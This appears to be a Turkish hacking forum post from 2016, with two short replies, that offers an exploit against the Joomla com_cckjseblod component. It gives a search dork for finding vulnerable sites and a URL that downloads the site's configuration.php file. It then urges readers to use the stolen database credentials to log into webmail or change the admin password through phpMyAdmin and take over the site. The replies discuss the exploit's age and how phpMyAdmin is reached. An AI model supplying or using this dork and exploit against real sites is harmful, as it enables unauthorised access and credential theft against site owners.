Joomla Config file Haking 2016

Bu ay çıkan bir exploit daha taze, verileceğim dorkla veya dorku geliştirebilirsiniz, bulduğunuz joomla sitelerin config dosyasını okuyabilirsiniz , webmaile girebilirsiniz veya en iyisi phpmyadmin den admin password değiştirip admin girişi sağlayabilirsiniz.

Dork: inurl: option=com_cckjseblod

Exploit: www.site.com/index.php?option=com_cckjseblod&task=download&file=configuration.php

diye eklediğinizde cong dosyası inecektir direk ordan notepad ile acıp bilgileri görebilirsiniz. Kalın sağlıcakla

 

Exploit cıkalı 1 ay değil 6 7 ay oluyorda benim anlamadıgım olay phpmyadmin yazmışsın cpanele girmeden phpmyadmine nasıl giriyorlar yanliş biliyorsam bilgilendirirsiniz. uzak bağlantı iltimali varmıdır bilemem onu.

Acık hala mevcut wp'deki gibi bi exploit cıkaramadılar hala revslider acığına benziyor